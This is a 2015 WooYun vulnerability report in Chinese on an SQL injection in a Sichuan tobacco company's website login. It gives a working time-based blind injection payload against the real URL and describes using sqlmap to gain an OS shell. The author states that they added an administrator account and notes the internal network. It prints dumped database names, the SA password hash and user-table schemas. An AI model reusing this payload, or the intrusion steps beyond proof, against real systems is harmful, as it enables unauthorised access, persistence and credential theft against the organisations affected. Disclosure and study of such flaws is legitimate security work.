当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104036

漏洞标题:四川烟草网MSSQL遇SA权限能执行0S-SHELL成功提权服务器(可内网渗透)

相关厂商:四川烟草工业有限责任公司

漏洞作者: 千斤拨四两

提交时间:2015-03-27 00:20

修复时间:2015-03-27 11:24

公开时间:2015-03-27 11:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-27: 细节已通知厂商并且等待厂商处理中
2015-03-27: 厂商已经确认,细节仅向厂商公开
2015-03-27: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

在后台登陆框用户名参数存在基于时间的盲注,SQLMAP可直接获取SA权限执行系统命令!

详细说明:

POC:

http://www.scti.cn/WebSiteMaintain2014/checkLogOn.do
下面是POST提交内容:
Button2=&password=&rememberUserNameCheckBox=&user_name=-1' or 51 = '49'; WAITFOR DELAY '0:0:5'--&__EVENTVALIDATION=/wEWBQKXspW9DwL9lveNCgLyveCRDwK7q7GGCAKxlvb0BVFfM467wXsnDsVZkemwGxMBVR+7&__VIEWSTATE=/wEPDwUJODAxNjkyMzMwZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUHQnV0dG9uMgUYcmVtZW1iZXJVc2VyTmFtZUNoZWNrQm94MWP2irUu6DSaU60Ombou6nrvC+c=


user_name参数可利用时间戳盲注!
下面看步骤现行判断当时权限,直接执行命令:

c.png


SA权限,可尝试os-shell若是xp_cmdshell没有查出可直接获取系统权限。
即为SA权限也可爆出数据裤密码,执行命令。

v.png


若是1433端口开放也可连接数据库,但是1433开放,执行OS-SHELL。
执行成功,直接判断系统环境。

b.png


直接着执行命令看看当前用户的权限:

n.png


哈哈,直接是系统管理员的权限和那些用户,看看一下服务器所处的的环境。

n.jpg


e.png


所处环境是内网10.164.x.x的,执行net user添加系统用户,不在赘述直接上图!

admin.png


admins.png


分分钟直接添加成功,可内网渗透!
贴出一些数据库爆出的信息:

available databases [11]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] ProductionManage
[*] ProductionPlanManage
[*] pubs
[*] scgy_cd
[*] scgyWW
[*] tempdb
[*] WebSite2014


database management system users password hashes:
[*] sa [1]:
    password hash: 0x0100e91f3a04fdf44e6586452bfb91e24c7819156597b34a5bea80ef1526af4f7a2a5274a0d6581c3f0495fa8be7\x02!


Database: WebSite2014
[40 tables]
+----------------------------+
| dtproperties               |
| sqlmapoutput               |
| sysconstraints             |
| syssegments                |
| v_dm_location              |
| v_getdate                  |
| v_xt_dept                  |
| v_xt_organise              |
| v_xt_t_user                |
| ww_attached_property_group |
| ww_attached_property_set   |
| ww_attached_property_value |
| ww_base_info               |
| ww_content                 |
| ww_content_adjunct         |
| ww_friend_website          |
| ww_invite_adjunct          |
| ww_invite_content          |
| ww_mod                     |
| ww_query_authority         |
| ww_visits_info             |
| xt_t_data_dict             |
| xt_t_error_log             |
| xt_t_function_mod          |
| xt_t_log                   |
| xt_t_log_info              |
| xt_t_log_set               |
| xt_t_mod_access            |
| xt_t_mod_access_detail     |
| xt_t_modulehelp            |
| xt_t_organise              |
| xt_t_param_enum_type_value |
| xt_t_parameter             |
| xt_t_parameter_disp_rows   |
| xt_t_parameter_type        |
| xt_t_role                  |
| xt_t_role_popedom          |
| xt_t_shortcut_function     |
| xt_t_user                  |
| xt_t_user_role             |
+----------------------------+


Database: WebSite2014
Table: v_xt_t_user
[12 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| keyid         | numeric  |
| note_date     | datetime |
| person_id     | numeric  |
| remark        | varchar  |
| sort_id       | int      |
| unit_id       | numeric  |
| unitid        | varchar  |
| use_flag      | char     |
| user_account  | varchar  |
| user_name     | varchar  |
| user_password | varchar  |
| userid        | varchar  |
+---------------+----------+


Database: WebSite2014
Table: v_t_user
[4 columns]
+----------------+-------------+
| Column         | Type        |
+----------------+-------------+
| dat_utente_cre | non-numeric |
| ken_kanji      | non-numeric |
| mgr            | non-numeric |
| user_uname     | non-numeric |


漏洞证明:

这些事一些贴图用户证明!

x.png


z.png


q.png


w.png


r.png


修复方案:

过滤修补SQL注射,把系统xp_cmdshell插件删除!

版权声明:转载请注明来源 千斤拨四两@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-27 11:23

厂商回复:

已修复

最新状态:

2015-03-27:已修复

2015-03-27:已修复